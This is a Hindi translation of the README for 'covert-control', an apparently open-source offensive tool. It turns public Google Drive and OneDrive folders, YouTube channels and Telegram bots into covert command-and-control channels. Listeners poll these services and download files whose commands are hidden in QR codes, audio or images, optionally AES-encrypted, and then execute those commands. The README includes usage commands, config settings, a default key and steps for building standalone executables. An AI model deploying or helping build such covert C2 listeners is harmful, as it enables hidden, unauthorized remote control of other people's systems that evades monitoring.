
Google Drive, OneDrive और Youtube को गुप्त चैनल के रूप में - Google Drive, OneDrive, Youtube या Telegram पर फ़ाइलें अपलोड करके सिस्टम को दूरस्थ रूप से नियंत्रित करें
फ़ाइलों को Google Drive, OneDrive, Youtube या Telegram पर अपलोड करके सिस्टम को दूरस्थ रूप से नियंत्रित करें। फ़ाइलें और लिसनर बनाने के लिए Python का उपयोग करें। यह टेक्स्ट फ़ाइलें, इमेज, ऑडियो या वीडियो बनाने की अनुमति देता है, जिसमें कमांड सादे पाठ में या AES का उपयोग करके एन्क्रिप्टेड हो सकते हैं।
covert-googledrive.py - Google Drive में सार्वजनिक फ़ोल्डर में फ़ाइलें अपलोड करके सिस्टम को नियंत्रित करें।
covert-onedrive.py - OneDrive में सार्वजनिक फ़ोल्डर में फ़ाइलें अपलोड करके सिस्टम को नियंत्रित करें।
covert-youtube.py - Youtube पर वीडियो अपलोड करके सिस्टम को नियंत्रित करें (covert-tube से अपडेटेड)।
covert-telegram.py - Telegram बॉट के साथ सिस्टम को नियंत्रित करें।
आप test_files फ़ोल्डर में उदाहरण फ़ाइलें पा सकते हैं या generate_file.py से नई फ़ाइलें बना सकते हैं:
python3 generate_file.py -t TYPE [-o OUTPUTFILE] [-c COMMAND] [-e]
-t (--type) [आवश्यक]: फ़ाइल के प्रकार: "text", "image", "audio" या "video"।
-o (--outputfile) [वैकल्पिक]: आउटपुट फ़ाइल।
-c (--command) [वैकल्पिक]: निष्पादित करने के लिए कमांड।
-e (--encrypted) [वैकल्पिक]: AES के साथ कमांड को एन्क्रिप्ट करने के लिए यह फ़्लैग जोड़ें।
उदाहरण:
python3 generate_file.py -t text -c "whoami" -o text.txt
python3 generate_file.py -t text -c "whoami" -o text_encrypted.txt -e
python3 generate_file.py -t audio -c "whoami" -o audio.wav
python3 generate_file.py -t audio -c "whoami" -o audio_encrypted.wav -e
python3 generate_file.py -t image -c "whoami" -o image.png
python3 generate_file.py -t image -c "whoami" -o image_encrypted.png -e
python3 generate_file.py -t video -c "whoami" -o video.avi
python3 generate_file.py -t video -c "whoami" -o video_encrypted.avi -e
सामान्य कॉन्फ़िगरेशन मान:
data_type (वैकल्पिक। डिफ़ॉल्ट: "text"):
विशिष्ट कॉन्फ़िगरेशन मान:
googledrive_folder: निगरानी करने के लिए सार्वजनिक Google Drive फ़ोल्डर का URL (covert-googledrive.py के लिए)।
onedrive_folder: निगरानी करने के लिए सार्वजनिक OneDrive फ़ोल्डर का URL (covert-onedrive.py के लिए)।
youtube_channel_id: निगरानी करने के लिए Youtube चैनल का ID। आप इसे यहाँ से प्राप्त कर सकते हैं (covert-youtube.py के लिए)।
youtube_api_key: यहाँ एक एप्लिकेशन बनाकर और कुंजी उत्पन्न करके API कुंजी प्राप्त करें (covert-youtube.py के लिए)।
telegram_token: बॉट टोकन, इसे BotFather का उपयोग करके बनाएं। "/newbot" लिखें, फिर बॉट के लिए एक नाम भेजें (उदाहरण के लिए, "botname") और बॉट के लिए एक उपयोगकर्ता नाम जो "-bot" पर समाप्त हो (उदाहरण के लिए, "somethingrandombot") (covert-telegram.py के लिए)।
telegram_username: एक Telegram उपयोगकर्ता नाम निर्दिष्ट करें ताकि यह केवल इस उपयोगकर्ता से प्राप्त कमांड को निष्पादित करे ("@" के बिना)।
यह टेक्स्ट फ़ाइलें, इमेज, ऑडियो और वीडियो अपलोड करके कमांड निष्पादित करने की अनुमति देता है, बिना एन्क्रिप्टेड या AES के साथ एन्क्रिप्टेड। वैकल्पिक इनपुट तर्क सार्वजनिक फ़ोल्डर url है, जिसे config.py में भी कॉन्फ़िगर किया जा सकता है:
python3 covert-googledrive.py [FOLDER_URL]
लिसनर डिफ़ॉल्ट रूप से हर 300 सेकंड में Google Drive फ़ोल्डर की जाँच करेगा (इसे config.py में अपडेट किया जा सकता है)। इस मामले में, एक वीडियो, "video.avi", वीडियो के QR में कमांड के साथ अपलोड किया गया है:

फ़ोल्डर में एक नई फ़ाइल अपलोड होने का पता लगाने के बाद, इसे डाउनलोड किया जाता है, संसाधित किया जाता है और कमांड निष्पादित किए जाते हैं:

यह टेक्स्ट फ़ाइलें, इमेज, ऑडियो और वीडियो अपलोड करके कमांड निष्पादित करने की अनुमति देता है, बिना एन्क्रिप्टेड या AES के साथ एन्क्रिप्टेड। वैकल्पिक इनपुट तर्क सार्वजनिक फ़ोल्डर url है, जिसे config.py में भी कॉन्फ़िगर किया जा सकता है:
python3 covert-onedrive.py [FOLDER_URL]
लिसनर डिफ़ॉल्ट रूप से हर 300 सेकंड में OneDrive फ़ोल्डर की जाँच करेगा (इसे config.py में अपडेट किया जा सकता है)। इस मामले में, एक ऑडियो, "audio_encrypted.wav", AES के साथ एन्क्रिप्टेड कमांड के साथ अपलोड किया गया है:

फ़ोल्डर में एक नई फ़ाइल अपलोड होने का पता लगाने के बाद, इसे डाउनलोड किया जाता है, संसाधित किया जाता है और कमांड निष्पादित किए जाते हैं:

नोट: यह केवल तब काम करेगा जब आप फ़ोल्डर में कोई फ़ाइल न हटाएँ; यदि आप ऐसा करते हैं, तो आपको एक नया फ़ोल्डर बनाना होगा। फ़ाइलों को हटाने के बाद भी इसे काम करने के लिए लागू करना संभव हो सकता है, लेकिन इसके लिए कई अनुरोध बनाने होंगे और यह कम गुप्त होगा।
यह वीडियो अपलोड करके कमांड निष्पादित करने की अनुमति देता है, बिना एन्क्रिप्टेड या AES के साथ एन्क्रिप्टेड। वैकल्पिक इनपुट तर्क Youtube चैनल ID और API कुंजी हैं, जिन्हें config.py में भी कॉन्फ़िगर किया जा सकता है:
python3 covert-youtube.py [CHANNEL_ID] [API_KEY]
लिसनर डिफ़ॉल्ट रूप से हर 300 सेकंड में Youtube चैनल की जाँच करेगा (इसे config.py में अपडेट किया जा सकता है)। पहले वीडियो अपलोड किया जाता है:

चैनल में एक नया वीडियो मिलने के बाद, इसे डाउनलोड किया जाता है, संसाधित किया जाता है और कमांड निष्पादित किए जाते हैं:

Telegram बॉट के साथ सिस्टम को दूरस्थ रूप से नियंत्रित करें। यह विकल्प फ़ाइलें अपलोड करने की अनुमति नहीं देता है, लेकिन कमांड को सादे पाठ में ("/cmd") या AES के साथ एन्क्रिप्टेड ("/encrypted") भेजना संभव है। पहला वैकल्पिक इनपुट तर्क बॉट टोकन है, जिसे config.py में भी कॉन्फ़िगर किया जा सकता है; दूसरा एकल Telegram उपयोगकर्ता को कॉन्फ़िगर करने के लिए उपयोग किया जाता है जो बॉट को कमांड भेज सकता है ("@" के बिना):
python3 covert-telegram.py [BOT_TOKEN] [TELEGRAM_USER]
लिसनर चैट में कमांड की जाँच करेगा और आउटपुट दिखाएगा:
/cmd CLEARTEXT_COMMAND
/encrypted AES_ENCRYPTED_COMMAND

sudo apt install libzbar0
pip install bs4 Pillow opencv-python pyqrcode pypng pyzbar youtube_dl pytesseract python-telegram-bot requests argparse pycryptodome
git clone https://github.com/ricardojoserf/covert-control && cd covert-control/
pyinstaller --onefile covert-googledrive.py
pyinstaller --onefile covert-onedrive.py
pyinstaller --onefile covert-telegram.py
pyinstaller --onefile covert-youtube.py
rm -rf build
rm *spec
ls dist/
| data_type | फ़ाइल प्रकार | एन्क्रिप्टेड | किसके लिए मान्य | एक्सटेंशन |
|---|
| text | टेक्स्ट फ़ाइल | नहीं | Google Drive, OneDrive | .txt |
| text_encrypted | टेक्स्ट फ़ाइल | हाँ | Google Drive, OneDrive | .txt |
| image | इमेज | नहीं | Google Drive, OneDrive | .png |
| image_encrypted | इमेज | हाँ | Google Drive, OneDrive | .png |
| audio | ऑडियो | नहीं | Google Drive, OneDrive | .wav |
| audio_encrypted | ऑडियो | हाँ | Google Drive, OneDrive | .wav |
| video | वीडियो | नहीं | Google Drive, OneDrive, Youtube | .avi |
| video_encrypted | वीडियो | हाँ | Google Drive, OneDrive, Youtube | .avi |
delay_seconds (वैकल्पिक। डिफ़ॉल्ट: 300): Google Drive या OneDrive फ़ोल्डर में अपलोड की गई नई फ़ाइलों या Youtube चैनल में नए वीडियो की जाँच के बीच सेकंड।
aes_key (वैकल्पिक। डिफ़ॉल्ट: "covert-control21"): AES एन्क्रिप्शन के लिए कुंजी।
debug (वैकल्पिक। डिफ़ॉल्ट: True): लिसनर में संदेश और टाइमस्टैम्प प्रिंट करें या नहीं।